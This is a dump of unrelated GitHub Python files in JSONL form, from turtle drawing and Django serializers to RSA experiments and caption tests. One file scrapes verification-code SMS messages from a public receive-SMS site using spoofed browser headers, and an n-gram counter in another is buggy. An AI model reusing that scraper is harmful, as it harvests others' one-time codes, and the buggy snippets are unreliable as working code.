while True:\n data = await r.receive()\n if data:\n print(data)\n await asyncio.sleep(1)\n","repo_name":"evernym/q","sub_path":"q/transports/tests/tcp_socket_receiver_donttest.py","file_name":"tcp_socket_receiver_donttest.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22926679742","text":"#!/Applications/anaconda3/bin/python\nfrom turtle import Screen, Turtle, color, colormode\nfrom random import randint, choice\nimport colorgram\n\n\ncolors = colorgram.extract('/Users/dmar0022/university/udemy/100_Days_of_Code/final_projects/files/d18_hirst_painting/image.jpg', 30)\ncolorlist = [list(c.rgb) for c in colors][1:]\ncolormode(255)\n\nt=Turtle()\nt.speed(0)\nt.hideturtle()\nt.up()\nt.goto(-200,-200)\n\nfor _ in range(10):\n for _ in range(10):\n t.dot(20,choice(colorlist))\n t.forward(50)\n t.left(180)\n t.forward(50*10)\n t.right(90)\n t.forward(50)\n t.right(90)\n\nscreen=Screen()\nscreen.exitonclick()","repo_name":"atteggiani/100_Days_of_Code","sub_path":"final_projects/files/d18_hirst_painting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32804604533","text":"# 自动抓取云短信网页上的验证码短信并分析来源\n# Tsing 2019.03.21\n# https://zhuanlan.zhihu.com/tsing\n\nimport re\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef get_page_info(link, f):\n\theader={ # 伪造 headers\n\t\t'User-Agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36',\n\t\t'Referer':'https://www.pdflibr.com',\n\t}\n\tr = requests.get(link, headers=header)\n\tsoup = BeautifulSoup(r.content, \"html.parser\")\n\ttable = soup.find_all(\"div\", class_=\"sms-content-table\") # 有两个 sms-content-table 的 table,第一个是最新的4条信息,第二个是全部的信息。\n\tinfos = table[1].select('tbody tr')\n\tfor info in infos:\n\t\tcontent = info.find_all(\"td\")[2].text[1:-1] # 首尾各去掉空格,这就是每一条短信的内容啦,可以写入文件里面哈。\n\t\tprint(content)\n\t\tprint(\"-\"*30)\n\t\tfrom_name = re.match(r'【(.*?)】', content) # 第一个大括号里面一般就是来源名称,采用(.*?)进行最短匹配,不然默认的(.*)是贪婪匹配。\n\t\tif(from_name):\n\t\t\tfrom_name = from_name.group(0)[1:-1] # 去掉首尾的大括号【】\n\t\t\t# print(from_name)\n\t\t\tf.write(from_name + '\\n') # 逐行写入txt文档,其实也可以不用写入文件,这里主要是方便自己查看。\t\t\n\t\t\ndef sort_result(filename):\n\tresult = [] # 逐行读取文本文档中的来源名称,生成list\n\twith open(filename,'r') as f:\n\t\tfor line in f:\n\t\t\tresult.append(line.strip('\\n').split(',')[0]) \n\t\n\tname_count = {} # 定义一个元组,键名为list中的元素,键值为出现的次数\n\tfor i in set(result): # set 用于去除重复元素。\n\t name_count[i] = result.count(i)\n\n\tsorted_dict = sorted(name_count.items(), key=lambda d:d[1], reverse = True) # 按照键值对 Dict 进行从大到小排序。\n\tfor item in sorted_dict:\n\t\tprint(item[0] + ': ' + str(item[1]))\n\n\nif __name__ == '__main__':\n\tfilename = \"info.txt\" # 指定一个文本文件保存数据\n\tf = open(filename,'w')\n\tfor i in range(1,101): # 自动翻页,这里可以设定需要抓取多少页(示例是100页)\n\t\tprint(\"\\n第%s页\\n\" % i)\n\t\tlink = \"https://www.pdflibr.com/SMSContent/1?page=\" + str(i)\n\t\tget_page_info(link, f)\n\t\ttime.sleep(4) # 不要频率太快,不然容易被封IP\n\n\tf.close()\n\tprint('\\r\\n各个来源出现的频次分别为:\\r\\n')\n\tsort_result(filename)","repo_name":"chenzhaohuai/Python","sub_path":"Learn/yunduanxin.py","file_name":"yunduanxin.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3862609304","text":"from __future__ import 
division\nimport numpy as np\nfrom genA import genA\nfrom relPerm import relPerm\nfrom scipy.sparse import spdiags\n\n\ndef upstream(Grid, S, Fluid, V, q, T): # Return S\n\n nx=Grid['nx']; ny=Grid['ny']; nz=Grid['nz']; N=nx*ny*nz;\n\n # Volume*Porosity\n pv=Grid['V']*np.reshape(Grid['por'], N)\n\n fi=np.maximum(q,0)\n XP=np.maximum(V['x'],0); XN=np.minimum(V['x'],0);\n YP=np.maximum(V['y'],0); YN=np.minimum(V['y'],0);\n ZP=np.maximum(V['z'],0); ZN=np.minimum(V['z'],0);\n\n # Total flux into each block\n Vi=XP[:,:,0:nx]+YP[:,0:ny,:]+ZP[0:nz,:,:]\\\n -XN[:,:,1:nx+1]-YN[:,1:ny+1,:]-ZN[1:nz+1,:,:]\n Vi = np.reshape(Vi, N)\n\n pm = np.min(pv/(Vi+fi))\n cfl = ((1.0-Fluid['swc']-Fluid['sor'])/3)*pm\n Nts = np.ceil(T/cfl)\n dtx = (T/Nts)/pv\n\n A = genA(Grid,V,q)\n # Compute A*dt/|Omega_i|\n A = spdiags(dtx,0,N,N).dot(A)\n # Compute Q_in*dt/|Omega_i|\n fi = fi*dtx\n\n for t in np.arange(0,Nts):\n mw, mo, dmw, dmo = relPerm(S,Fluid)\n fw = mw/(mw+mo)\n S = S+(A.dot(fw)+fi)\n\n return S\n","repo_name":"chanshing/python_msfv","sub_path":"upstream.py","file_name":"upstream.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"707357662","text":"fs = {}\nstack = []\n\nfor line in open(0):\n act = line.split()\n if act[1] == 'cd' and act[2] != '..':\n if act[2] == '/':\n x = '/'\n stack.append(x)\n else:\n x = \"\".join(stack[-1]) + act[2] + \"/\"\n stack.append(x)\n fs[x] = 0\n\n elif act[0].isnumeric():\n for i in stack:\n fs[i] += int(act[0])\n elif act[1] == 'cd' and act[2] == '..':\n stack.pop()\n\n\n#Task1\nsize = 0\nfor i in fs.values():\n if i < 100000:\n size += i\nprint(size)\n\n#task2\nthreshold = fs['/'] -( 70000000 - 30000000)\nfs = dict(sorted(fs.items(), key=lambda x:x[1]))\n\nfor val in fs.values():\n if val > threshold:\n print(val)\n break\n","repo_name":"zorell11/advent-of-code-2022","sub_path":"07/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18747218674","text":"from taskcoachlib import patterns, operating_system\nfrom taskcoachlib.i18n import _\nimport wx\nimport icons\n\n\nclass ArtProvider(wx.ArtProvider):\n def CreateBitmap(self, artId, artClient, size):\n if '+' in artId:\n w, h = size\n main, overlay = artId.split('+')\n\n overlayImage = self._CreateBitmap(overlay, artClient, size).ConvertToImage()\n overlayImage.Rescale(int(w / 2), int(h / 2), wx.IMAGE_QUALITY_HIGH)\n overlayAlpha = overlayImage.GetAlphaData()\n overlayBitmap = overlayImage.ConvertToBitmap()\n\n mainImage = self._CreateBitmap(main, artClient, size).ConvertToImage()\n mainAlpha = mainImage.GetAlphaData()\n mainImage.SetAlphaData(chr(255) * len(mainAlpha))\n mainBitmap = mainImage.ConvertToBitmap()\n\n dstDC = wx.MemoryDC()\n dstDC.SelectObject(mainBitmap)\n try:\n dstDC.DrawBitmap(overlayBitmap, w - int(w / 2), h - int(h / 2), True)\n finally:\n dstDC.SelectObject(wx.NullBitmap)\n mainImage = mainBitmap.ConvertToImage()\n\n # Just drawing works fine on OS X but clips to the destination bitmap on\n # other platforms. 
There doesn't seem to be anything better than this.\n resultAlpha = list()\n for y in xrange(h):\n for x in xrange(w):\n alpha = mainAlpha[y * w + x]\n if x >= w / 2 and y >= h / 2:\n alpha = max(alpha, overlayAlpha[(y - h / 2) * w / 2 + x - w / 2])\n resultAlpha.append(alpha)\n mainImage.SetAlphaData(''.join(resultAlpha))\n\n return mainImage.ConvertToBitmap()\n else:\n return self._CreateBitmap(artId, artClient, size)\n\n def _CreateBitmap(self, artId, artClient, size):\n if not artId:\n return wx.EmptyBitmap(*size)\n catalogKey = '%s%dx%d' % (artId, size[0], size[1])\n if catalogKey in icons.catalog.keys():\n bitmap = icons.catalog[catalogKey].getBitmap()\n if artClient == wx.ART_FRAME_ICON:\n bitmap = self.convertAlphaToMask(bitmap)\n return bitmap\n else:\n return wx.NullBitmap\n\n @staticmethod\n def convertAlphaToMask(bitmap):\n image = wx.ImageFromBitmap(bitmap)\n image.ConvertAlphaToMask()\n return wx.BitmapFromImage(image) \n\n\nclass IconProvider(object):\n __metaclass__ = patterns.Singleton\n\n def __init__(self):\n self.__iconCache = dict()\n self.__iconSizeOnCurrentPlatform = 128 if operating_system.isMac() else 16\n \n def getIcon(self, iconTitle): \n ''' Return the icon. Use a cache to prevent leakage of GDI object \n count. '''\n try:\n return self.__iconCache[iconTitle]\n except KeyError:\n icon = self.getIconFromArtProvider(iconTitle)\n self.__iconCache[iconTitle] = icon\n return icon\n \n def iconBundle(self, iconTitle):\n ''' Create an icon bundle with icons of different sizes. '''\n bundle = wx.IconBundle()\n for size in (16, 22, 32, 48, 64, 128):\n bundle.AddIcon(self.getIconFromArtProvider(iconTitle, size))\n return bundle\n \n def getIconFromArtProvider(self, iconTitle, iconSize=None):\n size = iconSize or self.__iconSizeOnCurrentPlatform\n # wx.ArtProvider_GetIcon doesn't convert alpha to mask, so we do it\n # ourselves:\n bitmap = wx.ArtProvider_GetBitmap(iconTitle, wx.ART_FRAME_ICON, \n (size, size)) \n bitmap = ArtProvider.convertAlphaToMask(bitmap)\n return wx.IconFromBitmap(bitmap)\n\n\ndef iconBundle(iconTitle):\n return IconProvider().iconBundle(iconTitle)\n\n\ndef getIcon(iconTitle):\n return IconProvider().getIcon(iconTitle)\n\n\ndef init():\n if operating_system.isWindows() and wx.DisplayDepth() >= 32:\n wx.SystemOptions_SetOption(\"msw.remap\", \"0\") # pragma: no cover\n try:\n wx.ArtProvider_PushProvider(ArtProvider()) # pylint: disable=E1101\n except AttributeError:\n wx.ArtProvider.Push(ArtProvider())\n\n\nchooseableItemImages = dict( \\\n arrow_down_icon=_('Arrow down'),\n arrow_down_with_status_icon=_('Arrow down with status'),\n arrows_looped_blue_icon=_('Blue arrows looped'),\n arrows_looped_green_icon=_('Green arrows looped'),\n arrow_up_icon=_('Arrow up'),\n arrow_up_with_status_icon=_('Arrow up with status'),\n bomb_icon=_('Bomb'),\n book_icon=_('Book'),\n books_icon=_('Books'),\n box_icon=_('Box'),\n bug_icon=_('Ladybug'),\n cake_icon=_('Cake'),\n calculator_icon=_('Calculator'),\n calendar_icon=_('Calendar'),\n cat_icon=_('Cat'),\n cd_icon=_('Compact disc (CD)'),\n charts_icon=_('Charts'),\n chat_icon=_('Chatting'),\n checkmark_green_icon=_('Check mark'),\n checkmark_green_icon_multiple=_('Check marks'),\n clock_icon=_('Clock'),\n clock_alarm_icon=_('Alarm clock'),\n clock_stopwatch_icon=_('Stopwatch'),\n cogwheel_icon=_('Cogwheel'),\n cogwheels_icon=_('Cogwheels'),\n computer_desktop_icon=_('Desktop computer'),\n computer_laptop_icon=_('Laptop computer'),\n computer_handheld_icon=_('Handheld computer'),\n cross_red_icon=_('Red cross'),\n 
die_icon=_('Die'),\n document_icon=_('Document'),\n earth_blue_icon=_('Blue earth'),\n earth_green_icon=_('Green earth'),\n envelope_icon=_('Envelope'),\n envelopes_icon=_('Envelopes'),\n folder_blue_icon=_('Blue folder'),\n folder_blue_light_icon=_('Light blue folder'),\n folder_green_icon=_('Green folder'),\n folder_grey_icon=_('Grey folder'),\n folder_orange_icon=_('Orange folder'),\n folder_purple_icon=_('Purple folder'),\n folder_red_icon=_('Red folder'),\n folder_yellow_icon=_('Yellow folder'),\n folder_blue_arrow_icon=_('Blue folder with arrow'),\n heart_icon=_('Heart'),\n hearts_icon=_('Hearts'),\n house_green_icon=_('Green house'),\n house_red_icon=_('Red house'),\n key_icon=_('Key'),\n keys_icon=_('Keys'),\n lamp_icon=_('Lamp'),\n led_blue_questionmark_icon=_('Question mark'),\n led_blue_information_icon=_('Information'),\n led_blue_icon=_('Blue led'),\n led_blue_light_icon=_('Light blue led'),\n led_grey_icon=_('Grey led'),\n led_green_icon=_('Green led'),\n led_green_light_icon=_('Light green led'),\n led_orange_icon=_('Orange led'),\n led_purple_icon=_('Purple led'),\n led_red_icon=_('Red led'),\n led_yellow_icon=_('Yellow led'),\n life_ring_icon=_('Life ring'),\n lock_locked_icon=_('Locked lock'),\n lock_unlocked_icon=_('Unlocked lock'),\n magnifier_glass_icon=_('Magnifier glass'),\n music_piano_icon=_('Piano'),\n music_note_icon=_('Music note'),\n note_icon=_('Note'),\n palette_icon=_('Palette'),\n paperclip_icon=_('Paperclip'),\n pencil_icon=_('Pencil'),\n person_icon=_('Person'),\n persons_icon=_('People'),\n person_id_icon=_('Identification'),\n person_talking_icon=_('Person talking'),\n sign_warning_icon=_('Warning sign'),\n symbol_minus_icon=_('Minus'),\n symbol_plus_icon=_('Plus'),\n star_red_icon=_('Red star'),\n star_yellow_icon=_('Yellow star'),\n trafficlight_icon=_('Traffic light'),\n trashcan_icon=_('Trashcan'),\n weather_lightning_icon=_('Lightning'),\n weather_umbrella_icon=_('Umbrella'),\n weather_sunny_icon=_('Partly sunny'),\n wrench_icon=_('Wrench'))\n\nitemImages = chooseableItemImages.keys() + ['folder_blue_open_icon',\n 'folder_green_open_icon', 'folder_grey_open_icon',\n 'folder_orange_open_icon', 'folder_red_open_icon',\n 'folder_purple_open_icon', 'folder_yellow_open_icon',\n 'folder_blue_light_open_icon']\n\nchooseableItemImages[''] = _('No icon')\n","repo_name":"TaskEvolution/Task-Coach-Evolution","sub_path":"taskcoach/taskcoachlib/gui/artprovider.py","file_name":"artprovider.py","file_ext":"py","file_size_in_byte":7786,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"21454219307","text":"import pytest\n\nfrom pycaption import (\n SCCReader, SCCWriter, SRTReader, SRTWriter, DFXPWriter, WebVTTWriter,\n)\n\nfrom tests.mixins import CaptionSetTestingMixIn\n\n# This is quite fuzzy at the moment.\nTOLERANCE_MICROSECONDS = 600 * 1000\n\n\nclass TestSRTtoSCCtoSRT(CaptionSetTestingMixIn):\n def _test_srt_to_scc_to_srt_conversion(self, srt_captions):\n captions_1 = SRTReader().read(srt_captions)\n scc_results = SCCWriter().write(captions_1)\n scc_captions = SCCReader().read(scc_results)\n srt_results = SRTWriter().write(scc_captions)\n captions_2 = SRTReader().read(srt_results)\n self.assert_captionset_almost_equals(\n captions_1, captions_2, TOLERANCE_MICROSECONDS\n )\n\n def test_srt_to_scc_to_srt_conversion(self, sample_srt_ascii):\n self._test_srt_to_scc_to_srt_conversion(sample_srt_ascii)\n\n\n# The following test fails -- maybe a bug with SCCReader\n# def 
test_srt_to_srt_unicode_conversion(self):\n# self._test_srt_to_scc_to_srt_conversion(SAMPLE_SRT_UNICODE)\n\n\nclass TestSCCtoDFXP:\n def test_scc_to_dfxp(self, sample_dfxp_from_scc_output,\n sample_scc_multiple_positioning):\n caption_set = SCCReader().read(sample_scc_multiple_positioning)\n dfxp = DFXPWriter(\n relativize=False, fit_to_screen=False).write(caption_set)\n\n assert sample_dfxp_from_scc_output == dfxp\n\n def test_dfxp_is_valid_xml_when_scc_source_has_weird_italic_commands(\n self, sample_dfxp_with_properly_closing_spans_output,\n sample_scc_created_dfxp_with_wrongly_closing_spans):\n caption_set = SCCReader().read(\n sample_scc_created_dfxp_with_wrongly_closing_spans\n )\n\n dfxp = DFXPWriter().write(caption_set)\n\n assert dfxp == sample_dfxp_with_properly_closing_spans_output\n\n def test_dfxp_is_valid_xml_when_scc_source_has_ampersand_character(\n self, sample_dfxp_with_ampersand_character,\n sample_scc_with_ampersand_character):\n caption_set = SCCReader().read(sample_scc_with_ampersand_character)\n\n dfxp = DFXPWriter().write(caption_set)\n\n assert dfxp == sample_dfxp_with_ampersand_character\n\n\nclass TestSCCToWebVTT:\n def test_webvtt_newlines_are_properly_rendered(\n self, sample_webvtt_from_scc_properly_writes_newlines_output,\n scc_that_generates_webvtt_with_proper_newlines):\n caption_set = SCCReader().read(\n scc_that_generates_webvtt_with_proper_newlines)\n webvtt = WebVTTWriter().write(caption_set)\n\n assert webvtt == sample_webvtt_from_scc_properly_writes_newlines_output\n","repo_name":"pbs/pycaption","sub_path":"tests/test_scc_conversion.py","file_name":"test_scc_conversion.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":243,"dataset":"github-code","pt":"3"} +{"seq_id":"70230399441","text":"import torch \nimport numpy as np\n# from model2_seq import TransFuser\nfrom config_seq import GlobalConfig\nfrom prettytable import PrettyTable\n# from only_image_gps_transfuser import TransFuser2\n# from two_images_gps_transfuser import TransFuser3\nfrom model_efnet_gpt import TransFuser4\nfrom model_efnet_swin import SwinFuser1\nfrom torchvision import models\n\ndevice = \"cuda:1\"\nconfig = GlobalConfig()\n\nadd_velocity = 1\nadd_mask = 0\nenhanced = 1\nangle_norm = 1 \ncustom_FoV_lidar = 1 \nfiltered = 0\nadd_seg = 0\n\nconfig.add_velocity = add_velocity\nconfig.add_mask = add_mask\nconfig.enhanced = enhanced\nconfig.angle_norm = angle_norm\nconfig.custom_FoV_lidar = custom_FoV_lidar\nconfig.filtered = filtered\nconfig.add_seg = add_seg\n\n\n# model = TransFuser4(config,device)\nmodel = SwinFuser1(config,device)\ntotal_params = sum(p.numel() for p in model.parameters())\nprint(f\"Number of parameters: {total_params}\")\n\n#for p in model.parameters():\n# print(p.numel())\n\ndef count_parameters(model):\n table = PrettyTable([\"Modules\", \"Parameters\"])\n total_params = 0\n for name, parameter in model.named_parameters():\n if not parameter.requires_grad: \n continue\n param = parameter.numel()\n table.add_row([name, param])\n total_params+=param\n print(table)\n print(f\"Total Trainable Params: {total_params}\")\n return total_params\n\ncount_parameters(model)\n\nimg_list = [torch.rand(2,3,config.crop,config.crop).to(device=device) for i in range(10)]\ngps_list = [torch.rand(2,5,2).to(device=device),torch.rand(2,5,2).to(device=device)]\n\nout = model(img_list, gps_list)\nprint(out.shape)\n\n#model2 = models.efficientnet_b0(pretrained =True)\n\n\n#block1 = models.efficientnet_b0(pretrained 
=True)\n#print(block1)\n","repo_name":"lingli878/V2V_swin","sub_path":"test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9768762544","text":"from dataclasses import fields\nimport dataclasses\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group\nfrom rest_framework import serializers\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.validators import UniqueTogetherValidator\nfrom api.models import Course, Driver, Rider, User\n\n\n# class UserSerializer(serializers.ModelSerializer):\n# password1 = serializers.CharField(write_only=True)\n# password2 = serializers.CharField(write_only=True)\n# group = serializers.CharField()\n\n# def validate(self, data):\n# if data['password1'] != data['password2']:\n# raise serializers.ValidationError('Passwords must match.')\n# return data\n\n# def create(self, validated_data):\n# group_data = validated_data.pop('group')\n# group, _ = Group.objects.get_or_create(name=group_data)\n# data = {key: value for key, value in validated_data.items() if key not in ('password1', 'password2')}\n# data['password'] = validated_data['password1']\n# user = self.Meta.model.objects.create_user(**data)\n# _,token = Token.objects.create(user = user)\n# token.save() \n# user.groups.add(group)\n# user.save()\n# return token\n\n# class Meta:\n# model = get_user_model()\n# fields = (\n# 'id',\n# 'username',\n# 'password1',\n# 'password2',\n# 'first_name',\n# 'last_name',\n# 'group',\n# #'photo',\n# )\n# read_only_fields = ('id',)\n\nclass UserSerializer(serializers.ModelSerializer):\n\n def create(self, validated_data):\n user = User.objects.create_user(**validated_data)\n _,token = Token.objects.get_or_create(user = user)\n return user\n\n class Meta:\n model = User\n fields = (\n 'id',\n 'username',\n 'first_name',\n 'last_name',\n 'email',\n 'password',\n )\n validators = [\n UniqueTogetherValidator(\n queryset=User.objects.all(),\n fields=['username', 'email']\n )\n ]\n\nclass LogInSerializer(TokenObtainPairSerializer):\n @classmethod\n def get_token(cls, user):\n token = super().get_token(user)\n user_data = UserSerializer(user).data\n for key, value in user_data.items():\n if key != 'id':\n token[key] = value\n return token\n\n\nclass TripSerializer(serializers.ModelSerializer):\n class Meta:\n model = Course\n fields = '__all__'\n read_only_fields = (\n 'id',\n 'created',\n 'updated',\n )\n\n\nclass NestedTripSerializer(serializers.ModelSerializer):\n class Meta:\n model = Course\n fields = '__all__'\n depth = 1\n################serializer pour le driver############################################\nclass DriverSerializer(serializers.ModelSerializer):\n class Meta:\n model = Driver\n fields = '__all__'\n\n#################### Serializer pour le Rider ########################################\n\nclass RiderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Rider\n fields = '__all__' ","repo_name":"Cheick433/Flutter_backend_django","sub_path":"UberFluttreApp/Users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11211102885","text":"# ************* XRSA Burp Table Code ***************\n\n# In[20]:\nimport 
time\nfile1=open(\"e_XRSA_file.txt\",\"w\")\nfile2=open(\"d_XRSA_file.txt\",\"w\")\n\n#X RSA Latest code\nfor i in range(1000):\n #key gen start-----------------------------------------------\n start_key_gen_time = time.time()\n # print(\"Key Generation:\\n\");\n p1 = generate_prime_number(1024); # 4 prime generation\n p2 = generate_prime_number(1024);\n p3 = generate_prime_number(1024);\n p4 = generate_prime_number(1024);\n # print(\"Bit size p1: \",p1.nbits())\n # print(\"Bit size p2: \",p2.nbits())\n # print(\"Bit size p3: \",p3.nbits())\n # print(\"Bit size p4: \",p4.nbits())\n # print(\"Is p1=\",p1, \"prime ? \", is_prime(p1));\n # print(\"Is p2=\",p2,\"prime ?\",is_prime(p2));\n # print(\"Is p3=\",p3, \"prime ? \", is_prime(p3));\n # print(\"Is p4=\",p4,\"prime ?\",is_prime(p4)); #CORRECT\n\n\n x = p1*p2;\n y = p3*p4;\n N = x*y; # evaluating N\n # print(\"\\nx=\",x);\n # print(\"y=\",y);\n # print(\"N=\",N); #CORRECT\n\n phi_x = (p1-1)*(p2-1); # evaluating Euler Totients: phi\n phi_y = (p3-1)*(p4-1);\n phi_N = phi_x*phi_y;\n # print(\"phi(x)=\", phi_x);\n # print(\"phi(y)=\", phi_y);\n # print(\"phi(N)=\", phi_N); #CORRECT\n\n while True: #Using this while loop cuz sometimes inverse mod doesn't exists\n try:\n\n #E1, E2 calculation\n E1 = ZZ.random_element(phi_x);\n while (gcd(E1, phi_x) != 1):\n E1 = ZZ.random_element(phi_x) #choosing E1\n # print(\"\\nE1 =\",E1);\n # print(\"*E1 < phi_x=\",E1 < phi_x); #checking conditions for E1\n # print(\"*gcd(E1,phi_x)=\",gcd(E1,phi_x)); #CORRECT\n\n E2 = ZZ.random_element(phi_y)\n while (gcd(E2, phi_y) != 1):\n E2 = ZZ.random_element(phi_y) #choosing E2\n # print(\"\\nE2 =\",E2);\n # print(\"*E2 < phi_y=\",E2 < phi_y) #checking conditions for E2\n # print(\"*gcd(E2,phi_y)=\",gcd(E2,phi_y)) #CORRECT\n\n E_dash = (E1*E2)%N\n # print(\"\\nE' = \",E_dash)\n\n D_dash = inverse_mod(E_dash,phi_N)\n break\n except:\n continue\n\n # print(\"D' = \",D_dash)\n\n E=(E_dash).__xor__(N); #print(\"\\nE = \",E) #CORRECT\n D=(D_dash).__xor__(N); #print(\"D = \",D) #CORRECT\n\n # print(\"\\npublic key = (\",N, \",\",E,\")\"); #Generated Key pairs\n # print(\"private key = (\",N, \",\",D,\")\\n\");\n file1.write(str(E)+\"\\n\")\n file2.write(str(D)+\"\\n\")\n\n final_key_gen_time = time.time()\n #key gen finish----------------------------------------------\n\n total_key_gen_time = final_key_gen_time - start_key_gen_time\n # print(\"\\nTotal Key generation time taken in seconds: \", total_key_gen_time )\n\n #Encryption start------------------------------------------\n start_encrypt_time = time.time()\n # print(\"\\nENCRYPTION:-------\");\n M = 59; #print(\"original msg=\",M) #original message M\n\n E_double_dash = (E).__xor__(N); #print(\"E'' = \",E_double_dash)\n C = power_mod(M,E_double_dash,N); #print(\"encrypted msg=\",C) #encrypted message C #CORRECT\n finish_encrypt_time = time.time()\n #Encryption finish------------------------------------------\n\n total_encrypt_time = finish_encrypt_time - start_encrypt_time\n # print(\"\\nTotal encrypt taken in seconds: \", total_encrypt_time )\n\n #Decryption start---------------------------------------------\n start_decrypt_time = time.time() \n # print(\"\\nDECRYPTION:-------\");\n D_double_dash = (D).__xor__(N); #print(\"D'' = \",D_double_dash)\n decrypt_msg = power_mod(C,D_double_dash,N) # decrypting #CORRECT\n #print(\"decrypted msg=\",decrypt_msg)\n finish_decrypt_time = time.time()\n #Decryption finish-------------------------------------------------\n\n total_decrypt_time = finish_decrypt_time - 
start_decrypt_time\n # print(\"\\nTotal decrypt time taken in seconds: \", total_decrypt_time )\n\n # Total Execution Time\n total_time_taken = total_key_gen_time + total_encrypt_time + total_decrypt_time\n # print(\"\\n\\nTotal algorithm time taken in seconds: \", total_time_taken)\n\n print(\"\\nIs decrypted msg & original msg same?\", (decrypt_msg==M))\n \nfile1.close()\nfile2.close()\n","repo_name":"Razaimam45/XRSA-An-enhanced-RSA-version","sub_path":"Variant Implementations/1000_e_d_generation_code_XRSA.py","file_name":"1000_e_d_generation_code_XRSA.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2013888061","text":"import re\r\n\r\n\r\ndef bigrams(text):\r\n words = text.split()\r\n return zip(words, words[1:])\r\n\r\ndef trigrams(text):\r\n words = text.split()\r\n return zip(words, words[1:], words[2:])\r\n\r\n\r\ndef ngram_probs(filename='raw_sentences.txt'):\r\n file = open(filename, 'r')\r\n sentence = file.read()\r\n text = re.sub('\\W', ' ', sentence.lower())\r\n words = text.split()\r\n def bigram_probs(compare):\r\n num = 0\r\n for i in zip(words, words[1:]):\r\n if i == list:\r\n num = num + 1\r\n return num\r\n def trigram_probs(compare):\r\n num = 0\r\n for i in zip(words, words[1:], words[2:]):\r\n if i == list:\r\n num = num + 1\r\n return num\r\n return bigram_probs, trigram_probs\r\n\r\n\r\na, b = ngram_probs()\r\n\r\nprint(a([('we', 'are')]))\r\n","repo_name":"YiWeiWayne/Test","sub_path":"English_count.py","file_name":"English_count.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1363534669","text":"import pandas as pd\r\n# from IPython.display import display\r\n\r\nlinks_df = pd.read_csv(\"./preprocess/links.csv\")\r\nlinks_df = links_df.dropna(axis=0)\r\nlinks_df['tmdbId'] = links_df['tmdbId'].astype(int)\r\n\r\nratings_df = pd.read_csv(\"./preprocess/ratings_small.csv\")\r\nratings_df = ratings_df.drop(['timestamp'], axis=1)\r\n\r\nnull = links_df.isnull().sum()\r\nprint(null)\r\nnull = ratings_df.isnull().sum()\r\nprint(null)\r\n# print(\"links len : \", len(links_df))\r\n# print(\"ratings len : \", len(links_df))\r\n\r\nmerge_df = pd.merge(links_df, ratings_df, on=\"movieId\", )\r\nmerge_df = merge_df[[\"userId\", \"tmdbId\", \"rating\"]]\r\n\r\nmerge_df.to_csv(\"./preprocess/merge.csv\")\r\n","repo_name":"AIHub-Cinemaster/movie-csv-preprocess","sub_path":"csv_merge.py","file_name":"csv_merge.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26734293954","text":"from itertools import groupby\nimport pymannkendall as mk\nimport numpy as np\n\nfrom trend.analysis.mlr_time_series_segmenter import MlrTimeSeriesSegmenter\nfrom models.models import Trend, TrendType\n\n\ndef get_trend_analyser():\n return TrendAnalyser()\n\n\nclass TrendAnalyser:\n def analyse(self, x, y) -> (list[int], list[Trend]):\n time_series_segmenter = MlrTimeSeriesSegmenter(min_segment_length=4)\n\n if all(val == 0 for val in y):\n return [], self.__get_trends_for_segments(x, y, [(0, len(x) - 1)])\n\n y_adjusted = (y / np.max(y)) * 100\n cuts = time_series_segmenter.segment(x, y)\n\n if len(cuts) == 0:\n return [], self.__get_trends_for_segments(x, y_adjusted, [(0, len(x) - 1)])\n\n cuts_i = [0] + [x.index(cut) for cut in cuts] + [len(x) - 1]\n\n # Sub-trends\n segments = 
[(cuts_i[i], cut) for i, cut in enumerate(cuts_i[1:])]\n\n trends = self.__get_trends_for_segments(x, y_adjusted, segments)\n trend_slopes = [trends[i].type.value for i in range(len(trends))]\n\n merged_segments = []\n for k, g in groupby(enumerate(trend_slopes), key=lambda i_x: i_x[1]):\n group = list(g)\n start_index = group[0][0]\n end_index = group[-1][0]\n merged_segments.append(\n (segments[start_index][0], segments[end_index][1]))\n\n # Whole time series\n merged_segments = [(0, len(x) - 1)] + merged_segments\n\n return [x[start] for (start, _) in merged_segments[2:]], self.__get_trends_for_segments(x, y_adjusted, merged_segments)\n\n def __get_trends_for_segments(self, x, y, segments):\n slopes = [mk.sens_slope(\n y[start:end + 1]).slope for start, end in segments]\n trends = [0 if np.abs(slope) < 1 else int(np.sign(slope))\n for slope in slopes]\n\n return [\n Trend(\n start=x[segments[i][0]],\n end=x[segments[i][1]],\n type=TrendType.NONE if trends[i] == 0 else (\n 